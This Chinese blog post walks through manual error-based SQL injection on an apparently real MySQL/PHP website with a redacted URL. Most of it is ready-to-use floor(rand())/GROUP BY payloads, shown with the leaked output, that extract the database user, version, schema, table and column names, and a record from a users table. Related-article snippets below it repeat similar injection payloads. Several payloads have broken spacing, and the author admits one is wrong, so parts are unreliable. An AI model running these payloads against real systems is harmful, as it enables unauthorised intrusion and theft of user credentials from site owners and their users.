mysql-php基于“错误”的手工注入----(select *)

最新推荐文章于 2023-04-23 10:50:23 发布
最新推荐文章于 2023-04-23 10:50:23 发布
阅读量908 收藏
点赞数
分类专栏: 手工注入实例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ask_man/article/details/40040219
版权

1.注入点:

http://www.******/index.php?********&id=14

2.确定当前用户:

 AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x23232323,(MID((IFNULL(CAST( CURRENT_USER() ASCHAR),0x20)),1,50)),0x23232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)

提示错误:*******_dbadmin@localhost


3.确定数据库版本:

AND (SELECT 8471 FROM (SELECT COUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)       

解析如下:

AND(
    SELECT 8471 FROM
                (SELECT COUNT(*),
                        CONCAT(0x716b6b7671,
                                (MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),
                                0x7166646b71,
                                FLOOR(RAND(0)*2)
                                )x
                        FROM INFORMATION_SCHEMA.CHARACTER_SETS
                        GROUP BY x
                )a
    )

提示错误: 5.5.37-cll


4.确定数据库:

AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST( DATABASE() ASCHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)

提示错误:******_web

 

5.确定当前is_dba:(此语句搞错了)

AND (SELECT 3040 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x616f7061636f5f646261646d696e LIMIT 0,1)=0x59) THEN 1ELSE 0 END)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)

6.确定数据库中的表个数及其名称:

AND (SELECT 4537 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT IFNULL(CAST(COUNT(table_name) ASCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN(0x***************)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

提示错误:个数是166个,,,提示 table_schema in(0x******************),参数为数据库名称的十六进制表示


以此确定每个表的名称:

AND(SELECT 7765 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x*******************) LIMIT0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)

 

---- 提示:limit 0,1是确定表名称的次序。0,1表示第一个表名称;1,1表示第二个表名称;33,1表示第34个表的名称。提示table_name=0x6a74626c5f7573657273 AND table_schema=0x******************,第一个参数为表名称,第二个参数数据库名称

提示错误:

7.确定表的列数及其名称:

AND(SELECT 1107 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTIFNULL(CAST(COUNT(*)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*************************),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

依次确定列名称:

AND(SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*********************LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

解析基于错误的SQL语句:

解析结果如下:

SELECT 4537 FROM
     (
     SELECT COUNT(*),
            CONCAT(
             0x716b6b7671,
             (SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20)
                     FROM INFORMATION_SCHEMA.TABLES
                     WHERE table_schema IN (0x*****************)),
             0x7166646b71,
             FLOOR(RAND(0)*2)
             )x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
     )a

红色部分:根据个人需求变化

8.查询指定列字段名
14 AND (SELECT 3313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********************** AND (column_name=0x******************) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

语句中column_name=0x******************查询列字段的名称(16进制)


9.查询指定列字段的数据类型
AND (SELECT 6785 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50)FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x******** AND (column_name=0x70617373776f7264) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


10.查询内部用户的信息:

AND (SELECT 3225 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(columns_name AS CHAR),0x20)),1,50) FROM *****_web.jtbl_users where username=0x6164616d LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)




ask_man
关注
专栏目录
基于报错的手工注入
qq_23066945的博客
10-27 509
基于报错的手工注入 实验环境:sqlli 1.首先提示,请输入ID作为参数和数值 2.构建id参数后,返回正常 3.输入转义符 \ ,得到报错信息 “1”) LIMIT 0,1 (图片上引号内的为报错信息,所以这里去掉两个引号) 由此,我们可以得到大概的SQL语句为 select * from users where id=("1") limit 0,1 尝试闭合单引号,并注释之后的...
SQL报错注入
qq_64332865的博客
02-18 629
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
Mysql基于错误回显的注入方法
focus on security
07-13 425
接用bwapp来本地演示了,正常页面如下: http://192.168.1.xxx/sqli_2.php?movie=1&action=go 注入参数是movie 0x03 尝试正常的’\’干扰,观察到页面确实报错了,实战中一般看到这种情况,存在注入已经八九不离十了,作为学习, 我们这里还是先按照基础的流程来,正常报错之后,我们还要再确认一遍,这里到底是不是真的存在注入 http://192.168.1.129/sqli_2.php?movie=1\&action=go ..
mysql基于“报错”的注入
weixin_30604651的博客
09-06 146
报错是如何转为xss的? mysql语句在页面报错,泄露信息 =====================================================================================================================================================================...
MySQL手工报错注入
L_KevinK的博客
08-01 1164
MySQL手工报错注入(1)测试注入点是否可用(2)爆数据库相关信息(2)爆数据库表名 (1)测试注入点是否可用 1后加 ’ 号页面报错,爆出错误信息 (2)爆数据库相关信息 报错注入语句有多种,此贴仅讲适用于此网站的一种 and updatexml(1,concat(0x7e,(select user()),0x7e),1)-- #爆数据库用户 and updatexml(1,c...
SQL手工注入漏洞测试(MySQL数据库-字符型)
qq_45883601的博客
12-07 429
进入靶场环境,两个墨币没了。。 然后点击公告,开始手工注入。 1、首先判断是否存在注入点, http://219.153.49.228:47679/new_list.php?id=tingjigonggao%20and%201=1 页面错误,存在注入点,接着用联合查询 ...
65.网络安全渗透测试—[SQL注入篇4]—[MySQL+PHP-手工注入详解]
qwsn
08-23 2071
我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 注入前置知识点 1、mysql的三种注释手段: 2、注入时常用的系统信息函数: 3、判断是否存在注入:`and/or逻辑语句` 4、判断字段/列数:`order by排序` 5、联合查询:
SQL注入篇--MySQL数据库 手工注入
STAR_LORD
08-01 3112
MySQL数据库 主流数据库之一 功能完善,强大 手工注入 1、判断注入
70.网络安全渗透测试—[SQL注入篇9]—[MySQL+PHP-延时注入]
qwsn
01-18 2383
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 延时注入 1、相关技术 二、延时注入示例:3步 1、判断是否存在注入 2、获取MySQL版本 3、获取库名 4、获取所有表名 5、获取字段名 6、获取数据 7、总结:
mysql报错型手工注入_mysql手工注入教程
weixin_34502439的博客
02-28 194
大家早上好!,H。U。C-枫 又和大家见面啦//本来早想做这个教程的,因为前段时间做过一套mssql的手工注入教程。今天给大家带来的是php+mysql手工注入。临时找了个点,所以有些东西不能全给大家演示。以后有机会再给大家补充些教程。这个就将就看吧。目标站点:http://www.doczj.com/doc/7b381bef48d7c1c708a145e0.html/myWeb/news_con...
记一次注册功能处Mysql手工报错注入
qq_36270253的博客
04-01 4171
记一次注册功能处Mysql手工报错注入 知识点:报错注入是使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息,比如select/insert/update/delete都可以使用报错来获取信息,报错注入的使用前提条件,是后台没有屏蔽数据库的报错信息,在语法发生错误的时候会显示在客户前端页面。 /////////分////////////割/////////\\\\\\线\\\\\\\\\\\ 安卓app除了反编译apk外,各功能点也有几率存在漏洞,甚至攻防演练的时候也可以从app资产寻找突破口。
mysql 手工报错注入_MYSQL手工注入(详细步骤)—(2)实战演练
weixin_35064596的博客
02-11 244
0x02 MYSQL 手工注入实战——基于错误的 SQL 注入前言,之前有对MYSQL基于报错的手工注入进行过介绍,但今天的实验环境,并不是基于报错的SQL注入,而是一个基于布尔的SQL盲注测试流程。这个网站的SQL注入漏洞,大概1年前就有人发现过了,我也是在找环境的过程中,突然发现的。这个网站是存在WAF的(WTS-WAF)但是这个WAF并不是很管用,只是把空格与某些重要函数放到了黑名单里面:废...
php漏洞注入,cmseasy 无限制报错注入php函数的坑)
weixin_32661683的博客
03-28 505
### 简要描述:cmseasy 无限制报错注入(可获取全站信息exp)### 详细说明:问题还是出在clive 上面,但是跟以往的不同的是,xjxquery 这个上面就发生了问题,看代码:xajax.class.php:```if ($rootTag == "xjxquery") {$sQuery = "";$this->iPos++;while (!stristr($this->a...
php mysql含引号报错,SQL注入之重新认识
weixin_31301881的博客
03-18 322
引言作为长期占据 OWASP Top 10 首位的注入,认识它掌握它是每个渗透测试人员必不可少的一个过程。下面我们一起学习SQL注入,本篇为SQL之重新认识,下一篇为SQL之老生常谈,主要讲解绕过和工具注入的知识。0x00 SQL注入简介所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,...
报错注入总结
zwish的信安之路
09-03 380
1、floor() 收集数据库信息:user()、database().... select * from user where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 爆表: select * fr...
PHP程序提示sql注入漏洞的处理方法
最新发布
wwwwestcn的博客
04-23 693
如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中!添加require_once('360_safe3.php');1.解压后将360_safe3.php传到要包含的文件的目录。a).在所需要防护的页面加入代码。就可以做到页面防注入、跨站。常用php系统添加文件。
68.网络安全渗透测试—[SQL注入篇7]—[MySQL+PHP-报错注入详解&示例]
qwsn
01-17 2921
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 报错注入 1、MySQL的报错信息: 2、爆库的简单方法: 3、常用报错语句1: 4、常用报错语句2: 5、报错注入总结:
69.网络安全渗透测试—[SQL注入篇8]—[MySQL+PHP-报错注入读写文件]
qwsn
01-18 2202
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、报错注入-读取文件 1、extractvalue()/exp() 读取文件 二、报错注入-伪写入文件 1、exp()伪写入文件
手工注入MySQL数据库:E108-数据库安全实践
"E108-数据库安全-手工注入mysql数据库" 本文主要讲解了如何进行MySQL数据库的手工注入,这是网络安全领域中一个重要的实践过程,主要用于揭示潜在的数据库安全漏洞。该课程通过一系列步骤,逐步指导用户如何检测和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值